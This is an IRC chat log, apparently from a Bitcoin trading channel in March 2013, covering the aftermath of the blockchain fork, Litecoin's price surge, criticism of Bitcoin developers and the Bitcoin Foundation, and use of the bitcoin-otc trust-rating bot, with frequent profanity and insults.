01:36:02 [19:05] Luke-Jr: On the subject of bitcointroll forum, I'm going to add a feature allowing you to mark your topics as self-moderated when you create them. In such topics, the OP can delete replies. That should solve some of your problems. Mar 13 01:36:03 I think it's just forked at 0.7 basically Mar 13 01:36:08 prolly nobody knows cause the devs are all dead Mar 13 01:36:11 that is so fucking broken Mar 13 01:36:12 like with debian Mar 13 01:36:19 oh, so the rise in ltc is just an emotional thing Mar 13 01:36:46 ummm its risen even before the fork Mar 13 01:36:56 dub: we must be able to silence the opposition Mar 13 01:37:07 i sold 10k ltc on the way down, i thought i did well by minimizing my loss Mar 13 01:37:15 theymos is such an ass Mar 13 01:37:26 (if that quote is to be believed) Mar 13 01:37:46 theymos is an ass even w/o the quote Mar 13 01:38:05 what's this theymos stuff about ? Mar 13 01:38:21 so, with that quote, it's official. theymos is from soviet russia Mar 13 01:39:13 i thought people were always able to delete their own crap on bitcointalk Mar 13 01:39:24 > OP can delete replies. Mar 13 01:39:31 thanks to MPOE-PR! Mar 13 01:39:37 what's that, op ? Mar 13 01:39:45 original poster Mar 13 01:39:58 right. Mar 13 01:40:21 so just don't post in topics created by luke Mar 13 01:40:25 (not that anyone does anyway) Mar 13 01:40:34 he's sorta like, dev-usagi by now anyway. Mar 13 01:41:10 the auction section is about to be awesome Mar 13 01:41:34 or scam accusations, anything really Mar 13 01:41:56 someone post evidence of you having stolen btc, just delete it Mar 13 01:42:14 he is dev-nefario Mar 13 01:42:32 only gmax actually wants him around Mar 13 01:44:45 ;;goxlag Mar 13 01:44:45 0 seconds Mar 13 01:45:02 less than Mar 13 01:45:03 $mpexlag Mar 13 01:45:05 kakobrekla: 0.0897209644318 seconds Mar 13 01:45:09 ha! Mar 13 01:47:55 [BTCTC] [COGNITIVE] 1 @ 0.18 BTC [-] Mar 13 01:48:38 http://imgur.com/a/vAzaK Mar 13 01:48:43 mircea_popescu: ^^ Mar 13 01:50:25 this thing is going to rock on android (for those willing to put their privkey on their phone Mar 13 01:51:12 aside from that, it's a very pleasing way to use mpex Mar 13 01:51:18 eee looks real cool Mar 13 01:51:26 lol wtf, gox offline ? Mar 13 01:51:31 ;;goxlag Mar 13 01:51:32 0.3137 seconds Mar 13 01:51:40 0_o Mar 13 01:51:54 no...? Mar 13 01:52:12 ;;goxlag Mar 13 01:52:12 0 seconds Mar 13 01:52:17 0 seconds is liek... ok srsly ?! Mar 13 01:52:29 lol Mar 13 01:52:42 it's prolly a rounding error Mar 13 01:52:50 from 54576937698796854 Mar 13 01:53:14 I think it's measuring how far behind just the trading engine is Mar 13 01:53:34 correct Mar 13 01:54:03 the fact they need such indicator Mar 13 01:54:08 speaks for itself Mar 13 01:59:51 [BTCTC] [BTC-TRADING-PT] 1 @ 0.2 BTC [+] Mar 13 02:00:26 IT appears that LTC will hit the dollar parity soon Mar 13 02:00:38 is this crazy talk or Mar 13 02:00:38 wtf Mar 13 02:01:18 its 0.00156 Mar 13 02:01:25 ;;ticker Mar 13 02:01:26 BTCUSD ticker | Best bid: 44.00000, Best ask: 44.08000, Bid-ask spread: 0.08000, Last trade: 44.08000, 24 hour volume: 183524.02883802, 24 hour low: 36.65000, 24 hour high: 48.39999, 24 hour vwap: 43.69802 Mar 13 02:01:33 ;;calc 44*0.00156 Mar 13 02:01:33 0.06864 Mar 13 02:01:56 is it me or is this far from dollar parity? Mar 13 02:02:11 ah nvm Mar 13 02:02:14 fucked up a zero Mar 13 02:02:23 ;;calc 44*0.0158 Mar 13 02:02:23 0.6952 Mar 13 02:02:29 possibru. Mar 13 02:05:32 dafuq Mar 13 02:05:49 and I've thrown away a bunch of ltc :/ Mar 13 02:05:59 derptiem Mar 13 02:06:50 must remember to have a look for it Mar 13 02:07:23 so is assbot getting buttfunder feed or no? Mar 13 02:07:39 hah Mar 13 02:07:46 need better intel on when to dump asicminer Mar 13 02:08:33 "TD that's why i don't understand people who say implementation diversity is a good thing. it's clearly not." Mar 13 02:09:21 i can buy a mining rig, yay Mar 13 02:16:55 75cents per ltc now Mar 13 02:17:23 insanity. Mar 13 02:18:13 ponzi tulip coin Mar 13 02:18:15 overprised? Mar 13 02:18:24 priced Mar 13 02:18:33 buy tulips now! Mar 13 02:18:42 is it cpuminable still? Mar 13 02:18:47 nope Mar 13 02:18:57 ive been wondering why the hell is it rising Mar 13 02:19:06 is it because gpu miners abandoning btc? Mar 13 02:19:07 cocain is a helluva drug Mar 13 02:19:14 some morons out there have dediced to rape it Mar 13 02:19:35 wait until july 2011 litecoin prices Mar 13 02:19:42 thne what Mar 13 02:19:50 Low: 0.3125 USD High: 0.7525 Mar 13 02:20:16 is that a spread or the low/high fo today Mar 13 02:20:28 yes Mar 13 02:20:33 low high Mar 13 02:20:38 basically noone has any idea if its worth anything Mar 13 02:21:03 ive watched it since 5 cents Mar 13 02:21:05 grow Mar 13 02:21:11 hmmm Mar 13 02:21:16 i'm not sure i'd call it growing Mar 13 02:21:21 01:11.57 ( kakobrekla ) but sersiouls how much use is there for ltc Mar 13 02:21:21 01:12.01 ( kakobrekla ) why would i USE it Mar 13 02:21:21 01:12.03 ( kakobrekla ) instead of btc Mar 13 02:21:24 maybe speculated Mar 13 02:21:36 on one exchange Mar 13 02:21:39 be funny if ltc became worth more than btc Mar 13 02:21:49 the trollbox is going nuts Mar 13 02:21:57 i'd laugh for sure Mar 13 02:22:14 i might sell some poop on ebay for a bajillion dolars too Mar 13 02:22:20 btc becomes worthless and its all about the ltc Mar 13 02:22:35 unless freicoin Mar 13 02:22:43 or some other tulip comes along Mar 13 02:23:14 currency exchange is one thing Mar 13 02:23:20 storage of value another entirely Mar 13 02:23:24 kakobrekla actually, if the current devs continue as bitcoin devs, i can envisage ltc becoming the standard coin. Mar 13 02:23:28 for instance, i will use it. Mar 13 02:23:39 mircea_popescu you die first Mar 13 02:23:40 heh Mar 13 02:23:42 i mean. Mar 13 02:23:45 oops Mar 13 02:23:48 oh so you sayin ltc devs are better than btc devs mircea_popescu Mar 13 02:23:57 no. i am saying the bitcoin devs are patent idiots Mar 13 02:24:01 and the ltc devs i do not know. Mar 13 02:24:08 cause there arent any? Mar 13 02:24:11 becasue there arre none Mar 13 02:24:11 excellent Mar 13 02:24:11 patent idiots lul Mar 13 02:24:12 ^ Mar 13 02:24:13 coblee Mar 13 02:24:23 he's the cut and paste engineer Mar 13 02:24:23 currently if all bitcoin devs were hit by a bus bitcoin would benefit immensely. Mar 13 02:24:35 do you think the price would go up? Mar 13 02:24:36 all forked up Mar 13 02:24:44 because pumpcoin Mar 13 02:24:48 jcpham ver .8 didn't make tiself. Mar 13 02:24:50 nor did ver .7 Mar 13 02:24:51 instantly see 100$ Mar 13 02:24:57 before you dumpcoin Mar 13 02:24:59 i was on .6 until yesterday Mar 13 02:25:09 shitty devs didn't tell me anything Mar 13 02:25:18 i want my goddamn money back mircea_popescu Mar 13 02:25:25 i'm calling customer support right now Mar 13 02:25:29 i will certainly have the girl ad psas to any future bullshiot "upgrades" they come up with Mar 13 02:25:46 as in, do not upgrade. the people pushing this broken code are irresponsible and you will lose out. Mar 13 02:25:55 the fucking software has all these retard shiny coins all over it Mar 13 02:26:03 i've never seen a single shiny anything Mar 13 02:26:45 esimobob off Mar 13 02:26:58 fuck your keyboard Mar 13 02:30:34 mpex should fund solidcoin development to replace bitcoin Mar 13 02:32:17 if it aint broken, don't fix it Mar 13 02:32:27 so simple Mar 13 02:32:49 but then again this was done on purpose because of politics Mar 13 02:52:57 wow, BTC to USD 42.233 || LTC 64.26735218 Mar 13 02:53:21 I'm going to be a thousandaire Mar 13 02:53:31 of which Mar 13 02:54:13 well, I guess I'm a thousandaire of LTC already, so soon I can be a thousandaire of USD. ;) Mar 13 02:54:32 BTC is what you are looking for. Mar 13 02:54:43 eh, for that I have a ways to go. Mar 13 02:54:47 :) Mar 13 02:54:51 I was close before I found the GLBSE Mar 13 02:55:05 heh Mar 13 02:55:05 got burned there? Mar 13 02:55:15 before you were just side? Mar 13 02:55:22 oh yeah. exactly Mar 13 02:55:31 :) Mar 13 02:55:34 it was just play money then unfortunately, and I treated it as such Mar 13 02:55:44 myea Mar 13 03:00:13 out for the day. later all. Mar 13 03:18:00 https://bitcointalk.org/index.php?topic=152457.0 Mar 13 03:21:18 thebuttholezone is such a prolix dick eater Mar 13 03:21:44 +1 Mar 13 03:21:53 i will admit Mar 13 03:21:54 i lol'd Mar 13 03:22:22 ah this si bitcurex Mar 13 03:22:29 is* Mar 13 03:22:39 thought it was the other simmilar sounding one Mar 13 03:22:43 bitfinex or smth Mar 13 03:23:04 but anywho the warning stands Mar 13 03:29:05 [BTCTC] [PAJKA.BOND] 30 @ 0.1 = 3 BTC [+] Mar 13 03:39:12 http://trilema.com/2013/mpex-ddosed-an-epic/ Mar 13 03:39:20 the blog you've all been missing secretly Mar 13 03:39:36 the blog that always tells me I need to pay up :( Mar 13 03:39:58 pizzaman1337 payup pizza man! Mar 13 03:40:01 10`000 btc Mar 13 03:40:48 if only I had that laying around Mar 13 03:42:25 o, also : http://polimedia.us/dtng/c/src/136084608044.jpg Mar 13 03:43:28 sweet mircea i made your blog Mar 13 03:43:30 all the txns that ended up in the orphaned fork, did they complete, or get 6 confirmations? Mar 13 03:43:39 BitHub :D Mar 13 03:43:55 or were they always unconfirmed? Mar 13 03:44:12 oops, wrong window. answers still appreciated Mar 13 03:44:48 looks like MPEx is back Mar 13 03:45:01 deadweasel yes they'll be fine Mar 13 03:45:05 most already resolved im sure. Mar 13 03:45:26 Namworld soon now. Mar 13 03:45:30 I'm curious what a transaction from an orphaned fork looks like? Mar 13 03:45:59 thats more of a statement than a ? Mar 13 03:47:17 just like a normal one Mar 13 03:47:44 glad the irc bot thing worked out, hope you find these dickheads hey Mar 13 03:48:17 so anyone who happened to be buying 3 lbs of gold in person with bitcion at exactly that time, would have seen 6 confirmations? Mar 13 03:48:28 and walked away? Mar 13 03:49:50 PPS. Everyone named in this article gets a block of 10`000 S.MPOE shares. Contact jurov to take possession - that include me mircea :) Mar 13 03:49:57 Well the blog is... MPEx will certainly follow soon Mar 13 03:50:02 BitHub don't get excited, it's for the helper ppl :D Mar 13 03:50:05 oh man Mar 13 03:50:09 Namworld certainly. Mar 13 03:50:12 hehe :) Mar 13 03:50:24 "named" not "quoted", you know. Mar 13 03:50:26 good read man, any idea who or why? Mar 13 03:50:30 nope. Mar 13 03:50:48 but on the positive side, mpex gets much better servers and stuff Mar 13 03:53:56 i'm suprised there's no mpex irc room Mar 13 03:54:12 you are innit Mar 13 03:54:18 :P Mar 13 03:54:28 i figured most of them were here :) Mar 13 03:54:40 well its the place to be Mar 13 03:55:41 is there a bitcoin security channel? Mar 13 03:55:54 well derp Mar 13 03:55:58 i'm just not welcome apparently Mar 13 03:56:09 benkay? Mar 13 03:56:19 yessir Mar 13 03:56:37 you are not welcome where? Mar 13 03:56:49 bitcoin security ? what is that ? Mar 13 03:57:04 #bitcoin-security Mar 13 03:57:07 i dunno Mar 13 03:57:09 is like bitcoin police Mar 13 03:57:13 but without the badge Mar 13 03:57:13 i was hoping to find someone who would tell me Mar 13 03:57:24 i was imagining a land of rainbows and ponies tbh Mar 13 03:57:29 s/land/chan Mar 13 03:58:03 where sages of netsec and hackers extraordinare waxed on the merits and methods of securing one's business Mar 13 03:58:24 you can ask here Mar 13 03:58:26 hh. Mar 13 03:58:40 sadly, this still is the best bitcoin chan. Mar 13 03:58:55 I love this channel Mar 13 03:59:02 :) Mar 13 03:59:38 this channel brings value to my life. Mar 13 03:59:43 's about all i can say. Mar 13 03:59:56 :) Mar 13 04:00:08 benkay: try #intersango Mar 13 04:00:18 Processor #32 Vendor GenuineIntel Name Intel(R) Xeon(R) CPU E5-2650 0 @ 2.00GHz Mar 13 04:00:24 some fuckin skurity proffessors in thur Mar 13 04:00:33 ahhh. seriously, what's sweeter than 32 core e5-2650 ? Mar 13 04:00:37 at least we know its genuine. Mar 13 04:01:06 mircea_popescu i need 20 cores nao. Mar 13 04:01:12 did you buy it with btc? Mar 13 04:01:17 pizzaman1337 nope. Mar 13 04:01:18 thanks dub Mar 13 04:01:22 :( Mar 13 04:01:28 but i got 3. Mar 13 04:01:28 ps: don't tell them I sent you Mar 13 04:01:45 dub dont fuck around with people like that Mar 13 04:01:48 pps: don't ask about makign backups Mar 13 04:01:51 which makes me actually have more hardware than mtgox atm. Mar 13 04:02:00 dub its not nice. Mar 13 04:02:13 benkay intersangro being, obviously, the fuckwit champs of btc. Mar 13 04:02:32 I though my follow up ' some fuckin skurity proffessors in thur' expressed an appropriate level of sarcasm? Mar 13 04:02:34 links? Mar 13 04:02:53 you guise i can make my own mind up about things Mar 13 04:02:59 ;;google bitcoin drama timeline Mar 13 04:03:00 The Bitcoin Drama Timeline pe Trilema - Un blog de Mircea Popescu.: ; Why S.MPOE is worth more than MtGox pe Trilema - Un blog de ...: ; Lolvacute, pentru posteritate pe Trilema - Un blog de Mircea Popescu.: :DD Mar 13 04:03:13 first one works best Mar 13 04:03:15 sorry for pooplinking Mar 13 04:03:17 i just dont want to see you wasting too much time benkay Mar 13 04:03:17 Like Waingro from Heat? Mar 13 04:03:30 oh ltc, lulz 75 cents so fast? :) Mar 13 04:03:34 i'm oddly flattered kakobrekla Mar 13 04:03:37 OH SHUTUP Chaang-Noi Mar 13 04:03:40 lol Mar 13 04:03:52 although i assume you're after next year's socket fee already Mar 13 04:03:55 i bought some last week. should i sell nao ? Mar 13 04:04:16 im thinkin dat too Mar 13 04:04:17 sorry kakobrekla :) Mar 13 04:04:27 its ok Chaang-Noi, just messing around. Mar 13 04:04:34 i know:) Mar 13 04:04:57 bitcoin breaking i think really showed people a more tested version is good to have around Mar 13 04:05:02 ;;calc 200000*0.75 Mar 13 04:05:02 150000 Mar 13 04:05:06 bitcoin after all is litecoins test chain :) Mar 13 04:05:21 LTC = more tested bitcoin Mar 13 04:05:23 I should have maffed dat in my head Mar 13 04:05:34 from where did this horse shit came Mar 13 04:05:51 trollin trollin, its good fun iuf you do it for money Mar 13 04:06:00 lol Mar 13 04:06:02 you troll well. Mar 13 04:06:08 thank you Mar 13 04:06:09 yeah man i got paid to troll lance armstrong for a while Mar 13 04:06:11 that was fun Mar 13 04:06:17 ;;rate Chaang-Noi 1 trolls well Mar 13 04:06:18 Error: For identification purposes, you must be identified via GPG to use the rating system. Mar 13 04:06:24 :) Mar 13 04:06:27 imposter! Mar 13 04:06:36 ;;rate Chaang-Noi 1 trolls well Mar 13 04:06:36 Error: For identification purposes, you must be identified via GPG to use the rating system. Mar 13 04:06:38 fu gribble Mar 13 04:06:44 im not on wot Mar 13 04:06:46 we call him Ken Doll Mar 13 04:06:49 ;;rate Chaang-Noi 1 trolls well Mar 13 04:06:49 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Mar 13 04:06:52 ah Mar 13 04:06:59 not in WOT?! Mar 13 04:07:05 NOT IN WOT?!?!?!? Mar 13 04:07:10 ;;rate Chaang-Noi -10 not in WOT Mar 13 04:07:11 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Mar 13 04:07:14 yeah, im trusted, i dont need it Mar 13 04:07:17 :) Mar 13 04:07:44 not anymore! Mar 13 04:07:45 ;;getrating goat Mar 13 04:07:45 This user has not yet been rated. WARNING: Currently not authenticated. Mar 13 04:07:55 people like gmaxwell rating people neg they never delt with cuz they do something like play s.dice really turned me off Mar 13 04:08:14 lolwut Mar 13 04:08:24 let me try again, i need coffee Mar 13 04:08:42 gmaxwell rates people -1 or -5 cuz they gamble on s.dice Mar 13 04:08:51 that pisses me off as people jsut abose it Mar 13 04:08:52 how nice of him Mar 13 04:09:03 so i wont use a system that is so fucked up Mar 13 04:09:26 haha Mar 13 04:09:36 stop gambling on s dice in a transparent way Mar 13 04:10:00 mp i'm enjoying your tirade on fucking a lot more than the drama posts Mar 13 04:10:27 :D Mar 13 04:10:45 i dont use s.dice it was just one example of how i see it abused Mar 13 04:10:57 pirate was like 2nd highest rated? lulz Mar 13 04:11:06 oh not this again Mar 13 04:11:23 OTC is just like Bitcoin. Each user can run however they want about attributing trust or distrust. Mar 13 04:11:37 you must learn to read wot Chaang-Noi Mar 13 04:12:30 tirade's the wrong word Mar 13 04:13:07 hm Mar 13 04:13:11 ;;getrating dub Mar 13 04:13:11 Currently authenticated from hostmask dub!~dub@unaffiliated/dub . User dub, rated since Wed Dec 19 14:09:17 2012. Cumulative rating 3, from 3 total ratings. Received ratings: 3 positive, 0 negative. Sent ratings: 7 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=dub Mar 13 04:13:20 oh you on the other hand are Mar 13 04:13:29 ;;rate dub 1 trolls well, too. Mar 13 04:13:30 Rating entry successful. Your rating of 1 for user dub has been recorded. Mar 13 04:14:29 yeah i just dont think wot is a good tool, not worth my time. i can see how it is goodfor some people not as well known as me, but im one of bitcointalks greatest trolls:) Mar 13 04:14:35 dang. in btc world, you blow things and you're arguably completely fucked for starting things under your own name ever again. Mar 13 04:14:41 :;rate Chaang-Noi -10 Too much black/purple/red in his home, really bad choice of colors. Doesn't give off a very trusty vibe like pure white. Mar 13 04:14:49 :) Mar 13 04:14:50 ^^ would be valid Mar 13 04:15:10 contrasts strongly against american startuplandia where you can pivot (fail) ten times with 3 different investment rounds, and still be lauded as a pop-hero Mar 13 04:15:25 thats so cool eh benkay Mar 13 04:15:29 ratings are just how much an user trust you. Someone insane could distrust someone for whatever. Mar 13 04:15:34 cool? Mar 13 04:15:40 cool is the grand canyon Mar 13 04:15:48 cool is fucking your buddy's wife Mar 13 04:15:54 in the summer too? Mar 13 04:16:01 the canyon, not the wife Mar 13 04:16:18 this is BITCOIN Mar 13 04:16:27 anyway the point is its nice to see you can be accountable in a way Mar 13 04:16:52 http://i3.kym-cdn.com/photos/images/newsfeed/000/138/644/THISISSPARTA!.jpg Mar 13 04:16:58 namworld but i remember who i trust, why do i need to use wot? Mar 13 04:17:09 or else we would still have patric harnets and such Mar 13 04:17:11 around Mar 13 04:17:16 no? Mar 13 04:17:18 You can use ;;gettrust to only get indirect ratings from people you trust yourself Mar 13 04:17:30 ;;gettrust mircea_popescu Mar 13 04:17:30 "in a way" Mar 13 04:17:30 Trust relationship from user Namworld to user mircea_popescu: Level 1: 5, Level 2: 6 via 4 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=Namworld&dest=mircea_popescu Mar 13 04:17:47 i dont know... after all my fail i was always honest and people trust me, and if they dont im happy to use escrow :) Mar 13 04:18:13 ;;gettrust Chaang-Noi Mar 13 04:18:13 Trust relationship from user Namworld to user Chaang-Noi: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=Namworld&dest=Chaang-Noi Mar 13 04:18:16 dunno man, dunno. Mar 13 04:18:27 about? Mar 13 04:18:31 I'm lacking data about you apparently. Mar 13 04:18:41 im not on wot Mar 13 04:18:58 but it's definitely a step towards a world where people generally know all there is to know about you. Mar 13 04:19:06 Explains it. Mar 13 04:19:16 benkay you mean facebook? Mar 13 04:19:24 not even man Mar 13 04:19:26 so far not even Mar 13 04:19:43 you are afraid to be over exposed over OTC wot Mar 13 04:19:45 or what Mar 13 04:19:45 think about a plugin to your radio system that identifies customers as they walk in your store and then queues up music for them Mar 13 04:19:48 im not following Mar 13 04:20:33 imagine truly pervasive surveillance Mar 13 04:20:34 nvm Mar 13 04:20:38 i don't have time for this conversation Mar 13 04:20:44 and i'm not nearly stoned enough to find it interesting. Mar 13 04:20:50 hehe Mar 13 04:20:56 mkay Mar 13 04:21:07 dont know, i dont use facebook either, i just dont like that sorta of social networking, i have a very good trading recored Mar 13 04:21:31 whoever uses facebook and bitcoin is retarded Mar 13 04:21:39 crypto anarchists on facebook, right. Mar 13 04:22:18 i kinda have the same idea about wot as i do facebook :/ Mar 13 04:22:19 https://www.facebook.com/pages/BitHub/579117455436997 - you can now contact BitHub via our FB page Mar 13 04:22:21 kakobrekla: my facebook name is fedarush akatom Mar 13 04:22:24 thanks. Mar 13 04:22:40 yw BitHub :) Mar 13 04:24:41 dude! you guys i don't even want to build a business in this space Mar 13 04:24:44 i mean i totally do Mar 13 04:24:47 but it scares me shitless. Mar 13 04:24:57 why? Mar 13 04:25:04 i mean Mar 13 04:25:06 it should. Mar 13 04:25:26 there are three outcomes for me Mar 13 04:25:28 win Mar 13 04:25:30 i was dumb and sold 50k litecoin around 42 cents... should i cash out or buy more ltc... ahhh Mar 13 04:25:30 go to jail Mar 13 04:25:34 lose everyone's money Mar 13 04:25:45 benkay https://bitcointalk.org/index.php?topic=124441.0 Mar 13 04:25:58 i've read that many a time Mar 13 04:26:06 mkay Mar 13 04:26:24 well then you know what to do Mar 13 04:26:27 i'm actually looking forward to MPOE-PR "FIRST"ing it on a launch page Mar 13 04:26:35 its not that hard Mar 13 04:26:36 fisting? Mar 13 04:26:41 ah firsting. Mar 13 04:26:48 bitcoin.org down !? Mar 13 04:26:53 nm just slow Mar 13 04:26:56 you most likely wont go to jail Mar 13 04:27:09 unless you're doing something illegal or not paying taxes Mar 13 04:27:23 or move to where its legal Mar 13 04:27:47 "most likely" Mar 13 04:27:52 so comforting, sir. Mar 13 04:28:00 thats why we are here. Mar 13 04:28:12 pirate wont even go to jail Mar 13 04:28:15 not moving, either. i have roots here. Mar 13 04:28:20 did pirate disclose his identiy? Mar 13 04:28:23 identity Mar 13 04:28:23 at best SEC fucks with him, but SEC cant jail people Mar 13 04:28:31 yes pirate is very well known by all Mar 13 04:28:43 is he still operating in the space? Mar 13 04:28:50 not with that name no Mar 13 04:28:53 yeah he paid yesterday. Mar 13 04:29:06 sry just had to, was a long time since last one. Mar 13 04:29:25 :) Mar 13 04:29:44 i heard finland and costa rica are good places to setup bitcoin companies Mar 13 04:29:47 kakobrkla you should see my account size, once he pays out im going to be supper rich! Mar 13 04:29:54 Chaang-Noi :D Mar 13 04:30:03 i'm only dinner rich Mar 13 04:30:12 BitHub the way i see it, slovenia is fuckin awesome Mar 13 04:30:20 yeah? Mar 13 04:30:35 Australia not too bad Mar 13 04:30:37 no dramas Mar 13 04:30:38 yeah, noone give a flying fuck Mar 13 04:30:47 gives* Mar 13 04:30:51 nice kako where is that? Eastern Euro? Mar 13 04:31:16 one might argue its not south but central, ill take mps deficinion of being estern too Mar 13 04:31:26 definition Mar 13 04:31:27 i am just not leaving this town. Mar 13 04:31:33 i am glad to come visit you all Mar 13 04:31:37 i cant wait to travel more Mar 13 04:31:46 ugh, that was a dumb sentence. Mar 13 04:31:50 need to check out so many place Mar 13 04:31:54 s Mar 13 04:36:29 which place first, bithub? Mar 13 04:36:45 deadweasel i'm not going to pycon Mar 13 04:36:48 pynight i mean Mar 13 04:36:52 because i'm going to pycon Mar 13 04:38:32 mircea_popescu: wth, i know you like this number Mar 13 04:38:35 ValueError: Extra data: line 1 column 187 - line 22 column 65 (char 187 - 1337) Mar 13 04:38:42 lol! Mar 13 04:38:48 are you trolling me via my statjson? Mar 13 04:39:25 not intentionally. which is this ? Mar 13 04:39:35 benkay me neither Mar 13 04:41:26 mircea_popescu: some error I get when trying to decode my stat Mar 13 04:49:28 hih first ever btc-ltc i have seen https://bitcointalk.org/index.php?topic=18763.msg1618387#msg1618387 Mar 13 04:52:24 makes me wanna sell ltc. Mar 13 04:57:28 its a bad joke but still a first Mar 13 04:57:40 [BTCTC] [ASICMINER-PT] 1 @ 0.724998 BTC [-] Mar 13 04:57:47 anyway im off to a mini family vacation, they think iv sat too long at the computer :( Mar 13 05:00:12 real reason mp should not make new clients happen Mar 13 05:00:23 critical density in bitcoin space Mar 13 05:00:36 tear fabric of economic universe Mar 13 05:00:40 unpredictable results. Mar 13 05:01:01 [BTCTC] [ASICMINER-PT] 1 @ 0.724998 BTC [-] Mar 13 05:25:06 ;;bc,stats Mar 13 05:25:08 Current Blocks: 225589 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 202 blocks | Next Difficulty In About: 1 day, 6 hours, 52 minutes, and 44 seconds | Next Difficulty Estimate: 4822007.4493 | Estimated Percent Change: 10.39708 Mar 13 05:47:22 [BTCTC] [S.DICE-PT] 2500 @ 0.00559 = 13.975 BTC [+] Mar 13 06:01:18 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199 = 0.398 BTC [-] Mar 13 06:04:29 [BTCTC] [S.DICE-PT] 5 @ 0.0055 = 0.0275 BTC [-] Mar 13 06:08:00 [BTCTC] [BTC-TRADING-PT] 1 @ 0.24 BTC [+] Mar 13 06:10:19 [BTCTC] [S.DICE-PT] 4 @ 0.00559 = 0.0224 BTC [+] Mar 13 06:24:18 "I hope you can realize how much more we could accomplish and how much happier everyone would be if you acted like less of a douchebag." Mar 13 06:24:21 ahahaha this is rich. Mar 13 06:25:07 from to? Mar 13 06:27:45 ltc... Mar 13 06:28:04 its a buying bonanza Mar 13 06:28:36 kakobrekla the devs are idiots thread Mar 13 06:28:42 https://bitcointalk.org/index.php?topic=152027.0;all Mar 13 06:30:57 id give 10 btc to be able to punch misterbigg in the face, just once. Mar 13 06:33:53 lol Mar 13 06:34:56 wow @ https://bitcoinfoundation.org/about/board Mar 13 06:35:48 intresting characters Mar 13 06:36:13 >He is the mastermind who created the current trade engine and the multi-currency platform for Mt.Gox Mar 13 06:36:16 brilliant. Mar 13 06:36:29 is the s.dice guy in there as well? Mar 13 06:36:38 "Executive Director, Chairman of the Board, Treasurer" Mar 13 06:36:40 this is a toy. Mar 13 06:36:43 i hope it's obvious. Mar 13 06:36:58 hmmm Mar 13 06:37:46 now i feel silly defending bitcoin and how decentralized it is to teh haters Mar 13 06:37:59 i guess now we know what coings are being floated by coinlab. Mar 13 06:38:04 yeah its more fucked than whores at closin time BitHub Mar 13 06:38:31 but then again, as the girl said after the pirate fiasco : give your money to idiots, cause trouble across the board. Mar 13 06:38:43 apparently bitcoin people still have to learn a lot about how confidence tricks work. Mar 13 06:39:02 lulz kako Mar 13 06:39:29 so do we actually need the board? or should i give money to them? Mar 13 06:39:44 what for? Mar 13 06:40:21 i dont know i dont want to get in trouble Mar 13 06:40:58 i dont want to say anything bad about the foundation....but....... Mar 13 06:41:12 seems scammy? Mar 13 06:44:44 vote with your coins. Mar 13 06:49:37 i like how dodgy their pics look Mar 13 06:49:40 haha Mar 13 07:26:48 BitHub: The fastest way to shut up haters is to stop talking to them and walk away. Mar 13 07:27:39 yeah, i found its best to be like "yeah cool man" and go onto something else Mar 13 07:28:09 Aumann's agreement theorem means they're being irrational. Why even bother with irrational people? Mar 13 07:28:16 smickles: what was your formula for the price of a mining "share"? Mar 13 07:28:34 "Bye, have fun being bent over by the Universe for the rest of your life." Mar 13 07:29:11 standard foruma is reward/iff Mar 13 07:29:16 formul Mar 13 07:29:17 a Mar 13 07:29:18 fuck Mar 13 07:29:30 iff = diff Mar 13 07:29:36 ill shutup. Mar 13 07:29:48 [MPEX] [S.BBET] 100 @ 0.00181 = 0.181 BTC [+] Mar 13 07:31:01 wanna see how fast bitcoin can hit $500 ? Shift the decimal one place to the right.. Mar 13 07:31:01 ;;diff Mar 13 07:31:02 4367876.000842196 Mar 13 07:31:05 ha ha! oh I kill me.. Mar 13 07:31:26 ;;bc,btcguild Mar 13 07:31:26 14128725.59 Mar 13 07:31:47 eligius is 5+TH did you notice? Mar 13 07:31:47 ;;bc,eligius Mar 13 07:31:48 580880.010226 Mar 13 07:31:56 ;;bc,p2pool Mar 13 07:31:57 201745.680513 Mar 13 07:32:08 that eligius report is out-of-date. check eligius' stats page. Mar 13 07:32:29 nanotube: is this static data? Mar 13 07:32:53 ;;nextprice Mar 13 07:32:53 Error: "nextprice" is not a valid command. Mar 13 07:33:51 ;;bc,price Mar 13 07:33:52 Next Price Estimate: 49.634057 | Next Price In About 2 days, 23 hours, 23 minutes, and 44 seconds Mar 13 07:33:57 woo-hoo Mar 13 07:36:25 pigeons: no, it's all pulled live Mar 13 07:36:31 ;;help bc,eligius Mar 13 07:36:31 (bc,eligius ) -- Alias for "math calc [cut -1 [web fetch http://luke.dashjr.org/programs/bitcoin/pool/hashrate.txt]]/1000000". Mar 13 07:38:55 Luke-Jr: i'm shocked Mar 13 07:43:36 ah the eligius asics overheated Mar 13 08:03:44 [BTCTC] [BITVPS] 1 @ 0.00401 BTC [+] Mar 13 08:03:45 [BTCTC] [BITVPS] 50 @ 0.004 = 0.2 BTC [-] Mar 13 08:03:47 [BTCTC] [BITVPS] 100 @ 0.0039 = 0.39 BTC [-] Mar 13 08:03:49 [BTCTC] [BITVPS] 100 @ 0.0038 = 0.38 BTC [-] Mar 13 08:08:26 goes to show how much of a joke the idea of mining being some kind of democratic concensus system is Mar 13 08:09:36 dub miningis Mar 13 08:09:48 the current people doing it obviously aren't quite there yet, but no worries, Mar 13 08:09:53 money washes stupid. Mar 13 08:18:14 ;;bc,nethash Mar 13 08:18:18 33839.987497068854 Mar 13 08:18:37 ;;help bc,nethash Mar 13 08:18:37 (bc,nethash ) -- Alias for "cut -1 [web fetch http://bitcoin.sipa.be/speed-3D.txt]". Mar 13 09:02:45 any comments on yesterdays events? Mar 13 09:03:38 hmm Mar 13 09:04:18 lots of stuff happend yesterday like on a normal day Mar 13 09:04:28 the block chain fork Mar 13 09:04:33 but im guessing youre talking about fork yea Mar 13 09:04:37 hehe Mar 13 09:04:51 well we are still here Mar 13 09:04:58 the price reflects high confidence Mar 13 09:05:22 i enjoyed reading mircea's comments to the developers on the forum Mar 13 09:05:44 then you will prolly enjoy staying around Mar 13 09:06:26 i think the selling yesterday would have occured regardless Mar 13 09:06:56 dunno Mar 13 09:07:59 well even under the event the price never hit last weeks sell off Mar 13 09:27:16 bitbet now spams via twitter and rss feeds. Mar 13 09:32:11 btc-e is down Mar 